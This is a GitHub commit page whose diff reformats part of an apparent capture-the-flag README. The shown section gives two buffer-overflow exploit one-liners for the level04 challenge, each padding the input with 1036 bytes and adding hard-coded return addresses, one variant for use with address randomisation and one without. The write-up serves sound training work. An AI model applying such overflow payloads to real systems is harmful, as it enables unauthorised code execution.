Skip to content

Commit

Permalink
fix backticks
Browse files Browse the repository at this point in the history
  • Loading branch information
benmmurphy committed Mar 21, 2012
1 parent 04017f8 commit 41d72c7
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Expand Up @@ -54,11 +54,11 @@ level04 is vulnerable to a buffer overflow but it is a bit tricky to exploit bec

- working without address randomisation

gdb --args ./level04 `perl -e 'print "A" x 1036'``perl -e 'print "\xd0\xe3\xea\xf7\xde\xad\xbe\xef\xee\x6b\xfa\xf7"'`
``` gdb --args ./level04 `perl -e 'print "A" x 1036'``perl -e 'print "\xd0\xe3\xea\xf7\xde\xad\xbe\xef\xee\x6b\xfa\xf7"'` ```

- working with address randomisation. needs to be repeatedly run to succeed.

/levels/level04 `perl -e 'print "A" x 1036'``perl -e 'print "\xd0\xc3\x66\xf7\xde\xad\xbe\xef\xee\x4b\x76\xf7"'`
``` /levels/level04 `perl -e 'print "A" x 1036'``perl -e 'print "\xd0\xc3\x66\xf7\xde\xad\xbe\xef\xee\x4b\x76\xf7"'` ```


#Level 05
Expand Down

0 comments on commit 41d72c7

Please sign in to comment.